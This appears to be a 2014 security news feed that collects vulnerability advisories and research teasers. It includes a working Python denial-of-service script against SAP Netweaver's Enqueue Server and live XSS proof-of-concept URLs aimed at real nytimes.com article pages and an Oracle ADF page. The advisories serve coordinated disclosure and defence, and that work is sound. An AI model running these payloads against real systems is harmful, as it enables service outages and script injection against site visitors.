October 15, 2014, 3:23 am
All SSL connections rely on a chain of trust. This chain of trust, a part of PKI, is established by certificate authorities (CAs), which serve as trust anchors to verify the validity of who a device thinks it is talking to. However, there are literally hundreds of CAs installed by default on your smartphone, some of which have cause for concern in their inclusion. In this report we do a deep dive from the perspective of Android, with comparisons drawn to iOS, to examine the CAs that come preloaded on these devices and the details about them.
more here............https://bluebox.com/blog/technical/questioning-the-chain-of-trust-investigations-into-the-root-certificates-on-mobile-devices/
October 15, 2014, 6:40 am
SEC Consult Vulnerability Lab Security Advisory < 20141015-0 >
=======================================================================
              title: Potential Cross-Site Scripting
            product: ADF Faces
 vulnerable version: 12.1.2.0
      fixed version: versions with CPU Oct-2014 patch applied
             impact: low
           homepage: http://www.oracle.com/adf
              found: 2014-05-01
                 by: W. Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Oracle ADF is an end-to-end Java EE framework that simplifies application
development by providing out-of-the-box infrastructure services and a visual
and declarative development experience."

URL: http://www.oracle.com/technetwork/developer-tools/adf/overview/index.html

Vulnerability overview/description:
-----------------------------------
The ADF JSF implementation (ADF Faces) does not properly encode URLs specified
as a target to the goButton component. As this behavior is neither intuitive
nor documented in the component documentation [1], an application developer may
allow a user to specify destination URLs. In such an application, an attacker
is able to specify JavaScript code that is executed in the victim's browser as
soon as the victim clicks on the goButton component.

[1] http://jdevadf.oracle.com/adf-richclient-demo/docs/tagdoc/af_goButton.html

Proof of concept:
-----------------
The following snippet demonstrates a vulnerable JSF page:

[...]
<af:goButton destination="#{param['url']}" text="Continue to URL"/>
[...]

If this JSF page is called using the following URL, JavaScript code is
injected:

http://<host>/<path>?test=%27*alert%28%27XSS!%27%29*%27

As soon as the victim clicks on the goButton component, the attacker's code is
executed.

Vulnerable / tested versions:
-----------------------------
The version 12.1.2.0 of ADF Faces was found to be vulnerable. This was the
latest version at the time of discovery.

Vendor contact timeline:
------------------------
2014-05-21: Contacting vendor through secalert_us@oracle.com
2014-05-22: Oracle confirms receipt of the advisory and says that the vulnerability is being investigated (BUG ID: S0454750)
2014-05-23: Oracle states that this vulnerability (when confirmed) will be addressed in an upcoming CPU
2014-06-25: Oracle confirms the vulnerability, says it will be addressed with the next CPU
2014-10-14: Oracle publishes the CPU
2014-10-15: SEC Consult releases a coordinated security advisory

Solution:
---------
Update to the newest version.
More information can be found at:
http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html

Workaround:
-----------
As a workaround the "button" component can be used to replace the
"goButton" component.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
October 15, 2014, 7:35 am
A few months ago, when working on my slides for Insomni'hack, I had a few conversations with the Prezi security team. Among many defense-in-depth protections, they introduced some code forbidding access to private IP addresses. Their conversion backend (the one I exploited) was using Python urllib2, and the blacklist was implemented via the IPy library.
Given that I enjoy bypassing blacklists, I asked Prezi for this specific piece of code. And they gave it to me
more here...............http://www.agarri.fr/blog/
October 15, 2014, 8:36 am
Some time ago while working on Windows 8, we came across a rather unusual piece of disassembly in some Microsoft binary files. This post describes some of our findings and how they are related to a Windows internal project called Warbird.
Warbird is an enhancement of the license verification of Windows that is introduced in Windows 8/2012. The former system was too easy to intercept and to fake, so Microsoft decided to provide something that is harder to reverse engineer and to fake.
more here...........http://thisissecurity.net/2014/10/15/warbird-operation/
October 15, 2014, 8:37 am
Following the recognition at Virus Bulletin 2014 of ESET’s research on Operation Windigo, I took the opportunity to ask Marc-Etienne Léveillé, who worked directly on the Operation Windigo report, a few questions. Marc-Etienne is a malware researcher at ESET. He is interested in reverse engineering Linux and OS X malware. He is passionate about making links between different malware to have an overall view of how they are interconnected.
more here..........http://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/
October 15, 2014, 8:39 am
OpenSSL Security Advisory [15 Oct 2014]
=======================================
SRTP Memory Leak (CVE-2014-3513)
================================
Severity: High
A flaw in the DTLS SRTP extension parsing code allows an attacker, who
sends a carefully crafted handshake message, to cause OpenSSL to fail
to free up to 64k of memory causing a memory leak. This could be
exploited in a Denial Of Service attack. This issue affects OpenSSL
1.0.1 server implementations for both SSL/TLS and DTLS regardless of
whether SRTP is used or configured. Implementations of OpenSSL that
have been compiled with OPENSSL_NO_SRTP defined are not affected.
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
This issue was reported to OpenSSL on 26th September 2014, based on an original
issue and patch developed by the LibreSSL project. Further analysis of the issue
was performed by the OpenSSL team.
The fix was developed by the OpenSSL team.
Session Ticket Memory Leak (CVE-2014-3567)
==========================================
Severity: Medium
When an OpenSSL SSL/TLS/DTLS server receives a session ticket the
integrity of that ticket is first verified. In the event of a session
ticket integrity check failing, OpenSSL will fail to free memory
causing a memory leak. By sending a large number of invalid session
tickets an attacker could exploit this issue in a Denial Of Service
attack.
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.
This issue was reported to OpenSSL on 8th October 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
SSL 3.0 Fallback protection
===========================
Severity: Medium
OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications
to block the ability for a MITM attacker to force a protocol
downgrade.
Some client applications (such as browsers) will reconnect using a
downgraded protocol to work around interoperability bugs in older
servers. This could be exploited by an active man-in-the-middle to
downgrade connections to SSL 3.0 even if both sides of the connection
support higher protocols. SSL 3.0 contains a number of weaknesses
including POODLE (CVE-2014-3566).
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.
https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00
https://www.openssl.org/~bodo/ssl-poodle.pdf
Support for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller.
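As an added illustration of the server-side rule the advisory's references describe (example code, not OpenSSL's implementation), the Python below parses the cipher-suite list out of a ClientHello body, looks for the TLS_FALLBACK_SCSV signalling suite (value 0x5600) and applies the draft's check: a server whose highest supported version is above the version the client offered must reject a hello carrying the SCSV with an inappropriate_fallback alert, while a client that never sends the SCSV is served as before. The ClientHello bytes and the server's version set are constructed for the example.

```python
"""Model of the TLS_FALLBACK_SCSV server check (added example, not OpenSSL code)."""
import struct

TLS_FALLBACK_SCSV = 0x5600          # signalling cipher suite value from the draft
INAPPROPRIATE_FALLBACK = 86         # alert number the server sends on rejection
VERSION_NAMES = {(3, 0): "SSL 3.0", (3, 1): "TLS 1.0", (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}


def build_client_hello(version, suites):
    """Construct a minimal ClientHello body (constructed test input, not a capture).

    Layout follows RFC 5246 7.4.1.2: client_version(2) random(32)
    session_id<0..32> cipher_suites<2..2^16-2> compression_methods<1..2^8-1>.
    Extensions are omitted because the check does not need them.
    """
    body = bytes(version) + b"\x00" * 32 + b"\x00"            # zero random, empty session id
    body += struct.pack("!H", 2 * len(suites))
    body += b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                       # one compression method: null
    return body


def parse_client_hello(body):
    """Return (client_version, [cipher suites]) from a ClientHello body.

    Only the fields needed for the SCSV decision are decoded; any length
    that runs past the buffer raises ValueError instead of being trusted.
    """
    if len(body) < 37:
        raise ValueError("ClientHello body too short")
    version = (body[0], body[1])
    pos = 34                                   # 2-byte version + 32-byte random
    pos += 1 + body[34]                        # skip length-prefixed session_id
    if pos + 2 > len(body):
        raise ValueError("truncated before cipher_suites")
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    if cs_len < 2 or cs_len % 2 or pos + cs_len > len(body):
        raise ValueError("invalid cipher_suites length")
    suites = [struct.unpack("!H", body[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    return version, suites


def server_decision(body, server_max_version=(3, 3)):
    """Apply the downgrade-SCSV rule from the server's point of view.

    Returns ("accept", negotiated version name) or ("alert", alert number).
    Rule: if the hello carries TLS_FALLBACK_SCSV and client_version is lower
    than the highest version this server supports, the client is retrying
    at a level a MITM could have induced, so the server aborts. A legacy
    client that genuinely speaks only SSL 3.0 never sends the SCSV and is
    still served, which is what makes the SCSV safe to deploy.
    """
    client_version, suites = parse_client_hello(body)
    if TLS_FALLBACK_SCSV in suites and client_version < server_max_version:
        return ("alert", INAPPROPRIATE_FALLBACK)
    negotiated = min(client_version, server_max_version)
    return ("accept", VERSION_NAMES.get(negotiated, "unknown"))


if __name__ == "__main__":
    aes128 = 0x002F                            # TLS_RSA_WITH_AES_128_CBC_SHA, an ordinary suite
    # A browser retrying after a failed TLS 1.2 attempt: offers SSL 3.0 plus the SCSV.
    fallback = build_client_hello((3, 0), [aes128, TLS_FALLBACK_SCSV])
    print("fallback hello against a TLS 1.2 server:", server_decision(fallback))
    # An old client whose best really is SSL 3.0: no SCSV, still accepted.
    legacy = build_client_hello((3, 0), [aes128])
    print("legacy SSL 3.0 client:", server_decision(legacy))
```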
Build option no-ssl3 is incomplete (CVE-2014-3568)
==================================================
Severity: Low
When OpenSSL is configured with "no-ssl3" as a build option, servers
could accept and complete a SSL 3.0 handshake, and clients could be
configured to send them.
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.
This issue was reported to OpenSSL by Akamai Technologies on 14th October 2014.
The fix was developed by Akamai and the OpenSSL team.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20141015.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
October 15, 2014, 8:41 am
Analysis of a new variant of the famous PoS malware
Between April and September 2014, the American retailer Home Depot was targeted by criminals who aimed to steal credit card information. The malware used during these attacks targets Point of Sale systems. Home Depot said that the cyber criminals stole 56 million debit and credit card numbers from its customers.(1) G DATA SecurityLabs experts have now discovered a new variant of this malware dubbed FrameworkPOS. Its main part is rather similar to the malware previously described by Trend Micro.(2) But the big difference is the way stolen data is exfiltrated: the malware uses DNS requests!
more here...........https://blog.gdatasoftware.com/blog/article/new-frameworkpos-variant-exfiltrates-data-via-dns-requests.html
October 15, 2014, 10:08 am
Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.
A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.
more here..........https://www.drupal.org/SA-CORE-2014-005
October 15, 2014, 12:36 pm
The Netherlands was hit with a new spamrun designed to spread a cryptolocker variant known as torrentlocker from Monday October 13th 2014 onwards. Please note that torrentlocker appears to present itself to victims as cryptolocker in all cases. Fox-IT now receives multiple reports of new victims in the Netherlands and we are currently analyzing the new spamrun and malware that was subsequently used.
This blogpost is aimed at providing victims with advice on how to deal with the infections. It contains technical details that will help system administrators trace back the original infection, and contain the spread of the infection as much as possible. We will update this blog post as more information is available.
more here...........http://blog.fox-it.com/2014/10/15/torrentlocker-spreading-in-the-netherlands/
October 15, 2014, 1:50 pm
The keys to the kingdom pretty much always come down to acquiring source code for the web application you’re attacking from a blackbox perspective. This is a quick review of how I was able to get access to a particular client’s application source code using an extremely simple vulnerability: Directory Indexing. Interestingly enough, they also had a .git repository accessible at https://www.[redacted].com/.git/ (although the ‘why’ still baffles me). If you have access to this you also have access to any commits and all logs that may exist in the repo.
more here...........http://blog.whitehatsec.com/how-i-stole-source-code-with-directory-indexing-and-git/
October 16, 2014, 2:07 am
RTSP… Real Time Streaming Protocol… is a protocol largely ignored these days. Once the infrastructure relied upon in the early days of multimedia (Video) and developed by RealNetworks, RTSP resides largely in the background of common protocols we pay attention to as InfoSec professionals these days.
Typically found on port 554, RTSP is still a factor in network and network exposures. Why? Because many (if not most) of the commercial IP cameras out there still utilize RTSP as a mechanism for streaming their video feeds.
Why hack RTSP credentials?
more here..........http://teksecgrp.com/2014/10/rtsp-brute-forcing-for-fun-and-naked-pictures/
October 16, 2014, 2:28 am
Exploit Title: OpenX Open Redirect Vulnerability
Product: OpenX
Vendor: OpenX
Vulnerable Versions: 2.8.10 and probably prior
Tested Version: 2.8.10
Advisory Publication: OCT 8, 2014
Latest Update: OCT 8, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-2230
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]

Vulnerability Details:
OpenX adclick.php and ck.php are vulnerable to Open Redirect attacks.

Source code of adclick.php:

$destination = MAX_querystringGetDestinationUrl($adId[0]);
MAX_redirect($destination);

The "MAX_redirect" function is below:

function MAX_redirect($url)
{
    // Only the javascript: and data: schemes are rejected; any other
    // destination, including an arbitrary external host, is passed through.
    if (!preg_match('/^(?:javascript|data):/i', $url)) {
        header('Location: '.$url);
        MAX_sendStatusCode(302);
    }
}

The header() function sends a raw HTTP header to a client without any checking of the "$dest" parameter at all.

(1) For "adclick.php", the vulnerability occurs with the "&dest" parameter.
(2) For "ck.php", which uses the "adclick.php" file, the vulnerability occurs with the "_maxdest" parameter.

Solutions:
2014-10-12 Public disclosure with self-written patch.

References:
https://github.com/kriwil/OpenX/blob/master/www/index.php
http://www.tetraph.com/blog/cves/cve-2014-2230-openx-open-redirect-vulnerability/
http://www.openx.com
http://cwe.mitre.org
http://cve.mitre.org/
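For contrast with the MAX_redirect check quoted in the advisory, the Python below (an added example, not OpenX code) reproduces that scheme denylist and places an allowlist check beside it, so the two can be run over the same destinations. The allowed hosts and the sample destinations are constructed for the example.

```python
"""Denylist vs allowlist redirect validation (added example, not OpenX code)."""
import re
from urllib.parse import urlsplit

# Hosts this deployment may redirect to: an assumption made for the example.
ALLOWED_HOSTS = {"www.example.com", "ads.example.com"}


def vulnerable_allows(url):
    """Mirror of the check in OpenX's MAX_redirect (a denylist of two schemes).

    Anything that does not start with javascript: or data: passes, so any
    external http(s) URL or protocol-relative //host URL is redirected to.
    """
    return not re.match(r"^(?:javascript|data):", url, re.I)


def hardened_allows(url, allowed_hosts=ALLOWED_HOSTS):
    """Allowlist replacement: same-site paths or http(s) URLs on known hosts only."""
    # CR/LF would let the value break out of the Location header, and some
    # browsers treat a backslash as a slash, so reject all three outright.
    if any(c in url for c in "\r\n\\"):
        return False
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        # Relative reference: one leading slash, never "//host" or "///host".
        return url.startswith("/") and not url.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False
    # hostname strips userinfo and port, so "https://good@evil/" resolves to evil.
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


if __name__ == "__main__":
    samples = [                                      # constructed destinations
        "/www/delivery/lg.php?bannerid=1",           # same-site path
        "https://www.example.com/landing",           # allowed host
        "http://attacker.example/phish",             # external host
        "//attacker.example/phish",                  # protocol-relative
        "https://www.example.com@attacker.example/", # userinfo trick
        "JavaScript:alert(1)",                       # blocked by both
    ]
    for s in samples:
        print(f"{s!r:50} vulnerable={vulnerable_allows(s)!s:5} hardened={hardened_allows(s)}")
```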
October 16, 2014, 2:31 am
Some months ago I analyzed some PDF exploits that I received via SPAM mails. They contained the vulnerability CVE-2013-2729 leading to a ZeuS-P2P / Gameover sample. Back in June I received more PDF exploits, containing the same vulnerability, but in these cases it was a bit more difficult to extract the shellcode because the code was obfuscated.
more here...........http://eternal-todo.com/blog/CVE-2013-2729-obfuscated-pdf-exploits
October 16, 2014, 2:33 am
In vulnerability research, and computer security, we often deal strictly in the intangible. There are times however when tangible attack vectors can play a big part in real-world attacks. In a lot of cases it is USB memory sticks and related that play a common physical role in aiding attacks. From Stuxnet leveraging USB to bridge air gap networks to BadUSB there are many examples worth taking note. That is why this week's Microsoft Security Bulletin MS14-063 vulnerability in FastFat caught our eEye.
more here...........http://blog.beyondtrust.com/ms14-063-fastfat-vulnerability-fixed-years-ago
October 16, 2014, 7:07 am
New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)

Domain:
http://www.nytimes.com/

Vulnerability Description:
The vulnerability occurs at New York Times's URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes did not filter the content used for the construction at all before 2013.

Based on Nytimes's design, almost all URLs before 2013 are affected (all article pages). In fact, all article pages that contain a "PRINT" button, "SINGLE PAGE" button, "Page *" button or "NEXT PAGE" button are affected.

Nytimes changed this mechanism in 2013. It now decodes the URLs sent to its server, which makes the mechanism much safer. However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter the older URLs is cost: it costs too much (money and human capital) to change the database of all previously posted articles.

Living POCs:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/"><img src=x onerror=prompt('justqdjing')>?pagewanted=all&_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2009/08/06/technology/06stats.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2008/07/09/dining/091crex.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/"><img src=x onerror=prompt('justqdjing')>

POC Video:
https://www.youtube.com/user/tetraph

Vulnerability Analysis:
Take the following link as an example:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack

We can see that the reflected page contains the following code. All of it is vulnerable.

<li class="print"><a href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=print">Print</testtesttest?pagewanted=print"></a></li>
<li class="singlePage"><a href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><testtesttest?pagewanted=all">Single Page</vulnerabletoattack?pagewanted=all"></a> </li>
<li> <a onclick="s_code_linktrack('Article-MultiPagePageNum2');" title="Page 2" href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=2">2</testtesttest?pagewanted=2"></a></li>
<li> <a onclick="s_code_linktrack('Article-MultiPagePageNum3');" title="Page 3" href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=3">3</testtesttest?pagewanted=3"></a></li>
<a class="next" onclick="s_code_linktrack('Article-MultiPage-Next');" title="Next Page" href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=2">Next Page »</testtesttest?pagewanted=2"></a>

The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

Reported By:
Wang Jing, mathematics student from Nanyang Technological University, Singapore.
http://tetraph.com/wangjing/

More Details:
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/
October 16, 2014, 7:09 am
A lightweight packet capture application with
support for hardware timestamping (ns accuracy)
no external lib requirements (no libpcap)
TPACKET_V3 RX_RING using AF_PACKET
more here..........https://github.com/nccgroup/Watson
October 16, 2014, 7:13 am
IIS Crypto is a free tool that gives administrators the ability to enable or disable protocols, ciphers, hashes and key exchange algorithms on Windows Server 2003, 2008 and 2012. It also lets you reorder SSL/TLS cipher suites offered by IIS, implement best practices with a single click and test your website.
more here..........https://www.nartac.com/Products/IISCrypto/Default.aspx
October 16, 2014, 9:35 am
Ben Broussard of Denim Group presented at OWASP Austin on 9/30 and highlighted a really interesting new kind of attack: Account Entrapment.
more here...........https://www.alienvault.com/blogs/security-essentials/account-entrapment-the-victim-is-tricked-into-playing-for-the-wrong-team-with-cookie-abuse
October 16, 2014, 10:55 am
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability

1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL: http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release

2. **Vulnerability Information**

Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995

3. **Vulnerability Description**

SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the "Standalone Enqueue Server" service, part of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue Server" is a critical component of a SAP Netweaver installation in terms of availability, so the attack renders the whole SAP system unresponsive.

4. **Vulnerable Packages**

. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).

Other versions are probably affected too, but they were not checked.

5. **Vendor Information, Solutions and Workarounds**

Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:

. Restrict access to the Standalone Enqueue service by configuring Access Control Lists [4] and to the Standalone Enqueue Service TCP port 32XX (XX is the instance number).

SAP published a security note [3] with the fix.

6. **Credits**

This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Advisories Team.

7. **Technical Description / Proof of Concept Code**

When the trace level of the service is configured to stop logging when a pattern is found [2], the service does not properly control the amount of recursion, resulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the trace level with a wildcard Trace Pattern. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against the vulnerable systems, rendering the Enqueue Server unavailable.

The following python code can be used to trigger the vulnerability:

7.1. **Proof of Concept**

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200)
(options, args) = parser.parse_args()


def send_packet(sock, packet):
    # Enqueue Server framing: 4-byte big-endian length prefix, then the packet
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)


# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))

print "[*] Sending crash packet"
crash = '\xab\xcd\xe1\x23'                       # Magic bytes
crash+= '\x00\x00\x00\x00'                       # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'       # Packet/frag length
crash+= '\x03\x00\x00\x00'                       # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00'                                # Admin Eye-catcher
crash+= '\x01\x00\x00\x00'                       # Version
crash+= '#EAA'                                   # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00'                   # Len
crash+= '\x06\x00\x00\x00\x00\x00'               # Opcode/Flags/RC
crash+= '#EAE'                                   # Admin Eye-catcher
crash+= '\x01\x04\x00\x00'                       # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'       # Trace Level
crash+= '\x01'                                   # Logging
crash+= '\x01\x40\x00\x00'                       # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'       # No. patterns
crash+= '\x00\x00\x00\x25#EAH'                   # Trace Eye-catcher
crash+= '\x01*\x00'                              # Trace Pattern
crash+= '#EAD'                                   # Trace Eye-catcher
send_packet(connection, crash)
print "[*] Crash sent !"
-----/

8. **Report Timeline**

. 2014-06-02: Initial notification sent to SAP, including technical description to reproduce the vulnerability. Publication date set to Jun 30, 2014.
. 2014-06-03: Vendor notifies that the tracking number 1153917-2014 was created for this issue.
. 2014-06-26: Core Security requests SAP to inform the status of the advisory.
. 2014-06-30: The vendor informs they were not able to reproduce the issue and they request additional details and a proof of concept.
. 2014-06-30: Core Security sends SAP a full description of the vulnerability including a python script to trigger it.
. 2014-07-11: Core Security asks if the vendor was able to trigger the vulnerability. Additionally we requested to set a publication date for the advisory based on the release of a fix.
. 2014-07-14: The vendor informs they were able to reproduce the issue but they will not be able to provide a timeline for the fix at the time. They inform they will work with high priority on it and will inform us of the planned fix release date.
. 2014-08-12: Core Security asks if the vendor was able to develop a fix and if they have a possible timeline for its availability.
. 2014-08-13: The vendor informs that the fix is undergoing quality checks. They also inform that they can't provide an exact date of publication yet. They also request a 3 months grace period once the patch is available.
. 2014-08-13: Core Security informs SAP that after we get notice that the fix is available to the public we will publish the advisory accordingly and will not wait for the 3 months of grace as requested because that's not our proceeding policy.
. 2014-08-18: The vendor informs that the fix is going to be released with the October patch day, on Tuesday the 14th, of 2014.
. 2014-10-14: The vendor publishes the fix under the security note 2042845.
. 2014-10-15: Core Security releases the advisory.

9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. **Disclaimer**

The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
October 17, 2014, 1:37 am
Some Whisper users monitored even after opting out of geolocation services
Company shares some information with US Department of Defense
User data collated and indefinitely stored in searchable database
more here.............http://www.theguardian.com/world/2014/oct/16/-sp-revealed-whisper-app-tracking-users
and here is a response, allegedly from Whisper's CTO....https://news.ycombinator.com/item?id=8465980